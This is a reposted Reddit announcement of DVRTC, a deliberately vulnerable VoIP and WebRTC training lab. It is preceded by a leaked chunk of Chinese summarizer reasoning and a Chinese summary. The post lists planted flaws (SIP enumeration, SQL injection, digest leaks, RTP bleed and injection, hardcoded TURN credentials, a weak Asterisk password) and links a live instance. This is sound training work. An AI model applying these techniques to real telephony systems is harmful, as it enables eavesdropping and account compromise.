好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,理解其主要信息。 文章主要介绍了一个名为DVRTC的项目,旨在填补VoIP和WebRTC安全测试方面的空白。它详细描述了几个漏洞场景,比如Kamailio SIP代理的枚举、SQL注入、digest认证泄露,rtpengine的媒体泄漏和注入,coturn的硬编码凭据和宽松策略,以及Asterisk的弱密码问题。此外,还有7个练习和一个在线实例。 接下来,我需要将这些信息浓缩到100字以内。重点包括DVRTC的目的、使用的组件及其漏洞,以及提供的练习和在线实例。要确保语言简洁明了,直接描述内容,不需要使用特定的开头词。 最后,检查字数是否符合要求,并确保所有关键点都被涵盖。 </think> DVRTC是一个专注于VoIP和WebRTC安全测试的平台,通过部署Kamailio、Asterisk、rtpengine和coturn等组件模拟漏洞场景,并提供7个实践练习和在线实例供学习使用。 2026-3-27 10:22:7 Author: www.reddit.com(查看原文) 阅读量:4 收藏
Author here. DVRTC is our attempt to fill a gap that's been there for a while: web app security has DVWA and friends, but there's been nothing equivalent for VoIP and WebRTC attack techniques.
The first scenario (pbx1) deploys a full stack — Kamailio as the SIP proxy, Asterisk as the back-end PBX, rtpengine for media, coturn for TURN/STUN — with each component configured to exhibit specific vulnerable behaviors:
-
Kamailio returns distinguishable responses for valid vs. invalid extensions (enumeration), logs User-Agent headers to MySQL without sanitisation (SQLi), and has a special handler that triggers digest auth leaks for extension 2000
-
rtpengine is using default configuration, that enables RTP bleed (leaking media from other sessions) and RTP injection
-
coturn uses hardcoded credentials and a permissive relay policy for the TURN abuse exercise
-
Asterisk has extension 1000 with a weak password (1500) for online cracking
7 exercises with step-by-step instructions. There's also a live instance at pbx1.dvrtc.net if you want to try it without standing up your own.
Happy to answer questions.
如有侵权请联系:admin#unsafe.sh